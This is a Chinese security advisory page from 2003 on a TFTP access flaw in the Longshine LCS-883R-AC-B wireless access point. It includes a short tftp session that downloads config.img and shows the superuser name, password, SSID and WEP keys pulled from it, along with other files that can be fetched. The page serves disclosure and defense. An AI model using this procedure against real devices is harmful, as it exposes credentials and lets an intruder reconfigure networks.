首页 -> 安全研究

安全研究

安全漏洞
Longshine WLAN AP LCS-883R敏感信息泄露漏洞

发布日期:2003-01-06
更新日期:2003-01-09

受影响系统:
LONGSHINE Technologie Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
描述:
LCS-883R-AC-B是一款由Longshine开发和维护的无线访问接入点设备。

LCS-883R-AC-B由于对tftp访问缺少正确访问限制管理,远程攻击者可以利用这个漏洞下载配置文件、获得超级用户密码、WEP密钥等敏感信息。

由于对tftp没有正确访问限制,攻击者可以通过tftp连接AP访问接入点,下载多个包含敏感信息的配置文件,其中包含WEP加密密钥,Radius服务器认证的用户名和密码等信息。利用这些信息,可以对AP接入点配置进行更改。

<*来源:Lukas Grunwald (lukas@dnx.de
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104187735618081&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Lukas Grunwald (lukas@dnx.de)提供了如下测试方法:

tftp
tftp> connect 192.168.108.48
tftp> get config.img
Received 780 bytes in 1.0 seconds
tftp> quit


[~]/-\>strings config.img
DNXLABAP01 <- name of the AP
root <- name of the superuser
XXXXXX123 <- password from superuser
DNXLABLAN <- ssid
secu9 <- secret for WEP
7890abcdef <-

也可以下载如下配置文件:

config.img
wbtune.dat
mac.dat
rom.img
normal.img

建议:
厂商补丁:

LONGSHINE Technologie
---------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.longshine.de/

浏览次数:3356
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障